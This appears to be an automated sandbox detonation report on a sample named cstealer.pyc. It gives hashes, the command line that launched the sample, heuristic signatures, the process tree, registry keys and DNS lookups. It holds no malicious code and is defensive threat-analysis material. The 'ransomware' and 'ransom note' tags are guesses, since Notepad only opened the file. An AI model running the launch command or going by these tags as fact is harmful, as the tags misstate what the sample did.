SHA256 2663aa18fa523dd88df4d099e859c78e8f488ed3ab2037156a0218d9d00ec46b
SHA512 9df862aca72a3f706c1fefd02fbca3f6f5b4e2b2c27fe336a5a60e86cbc81b4ab5edce0e618d766d08ed335a84f7b8617bf94fef48f6737f3b04f5a612e11a3b

C:\Users\Admin\AppData\Local\Tempcsghutsbrz.db

MD5 87210e9e528a4ddb09c6b671937c79c6
SHA1 3c75314714619f5b55e25769e0985d497f0062f2
SHA256 eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512 f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-12 18:14

Reported

2024-11-12 18:31

Platform

win10ltsc2021-20241023-en

Max time kernel

582s

Max time network

442s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4324 wrote to memory of 2124 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE
PID 4324 wrote to memory of 2124 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
IE 20.223.35.26:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp

Files

N/A